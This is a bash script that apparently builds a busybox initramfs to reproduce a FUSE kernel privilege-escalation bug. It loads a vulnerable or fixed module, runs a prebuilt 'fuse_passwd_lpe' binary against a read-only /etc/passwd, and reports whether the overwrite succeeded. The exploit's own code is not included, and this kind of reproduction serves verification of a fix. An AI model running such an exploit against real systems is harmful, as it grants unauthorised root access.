#!/bin/bash
set -euo pipefail
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
REPRO_DIR="$ROOT/repro"
mkdir -p "$REPRO_DIR"
BUSYBOX_BIN="${BUSYBOX_BIN:-/usr/bin/busybox}"
WORK="$(mktemp -d)"
cleanup() { rm -rf "$WORK"; }
trap cleanup EXIT
mkdir -p "$WORK/bin" "$WORK/dev" "$WORK/proc" "$WORK/sys" "$WORK/tmp" "$WORK/target" "$WORK/mnt"
cp "$BUSYBOX_BIN" "$WORK/bin/busybox"
for c in sh mount umount mkdir cat grep head tail ls echo sleep insmod poweroff chmod chown id uname dmesg sync find; do
  ln -sf busybox "$WORK/bin/$c"
done
cp "$REPRO_DIR/fuse_passwd_lpe" "$WORK/fuse_passwd_lpe"
cp "$REPRO_DIR/fuse-vuln.ko" "$WORK/fuse-vuln.ko"
cp "$REPRO_DIR/fuse-fixed.ko" "$WORK/fuse-fixed.ko"
cat > "$WORK/init" <<'INITEOF'
#!/bin/busybox sh
export PATH=/bin
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs devtmpfs /dev
mkdir -p /target /tmp
ROLE="vuln"
for arg in $(cat /proc/cmdline); do
  case "$arg" in proof_role=*) ROLE="${arg#proof_role=}";; esac
done
if [ "$ROLE" = "fixed" ]; then
  insmod /fuse-fixed.ko || true
else
  insmod /fuse-vuln.ko || true
fi
for i in 1 2 3 4 5; do [ -b /dev/vda ] && break; sleep 1; done
mount -t ext4 -o ro /dev/vda /target || { echo INIT_MOUNT_FAIL; poweroff -f; }
echo INIT_ROLE=$ROLE
echo INIT_KERNEL=$(uname -r)
echo INIT_UID_BEFORE=$(id -u)
echo INIT_BEFORE=$(head -1 /target/etc/passwd)
/fuse_passwd_lpe --target /target/etc/passwd
rc=$?
echo INIT_EXPLOIT_RC=$rc
echo INIT_AFTER=$(head -1 /target/etc/passwd)
if [ "$ROLE" = "vuln" ] && [ $rc -eq 0 ]; then
  echo INIT_RESULT_PAGE_CACHE_LPE_CONFIRMED
elif [ "$ROLE" = "fixed" ] && [ $rc -ne 0 ]; then
  echo INIT_RESULT_FIXED_REJECTED_OVERSIZED_DIRENT
else
  echo INIT_RESULT_NOT_CONFIRMED
fi
sync
poweroff -f
INITEOF
chmod +x "$WORK/init"
(cd "$WORK" && find . | cpio -o -H newc 2>/dev/null | gzip > "$REPRO_DIR/lpe-initramfs.cpio.gz")
echo "$REPRO_DIR/lpe-initramfs.cpio.gz"
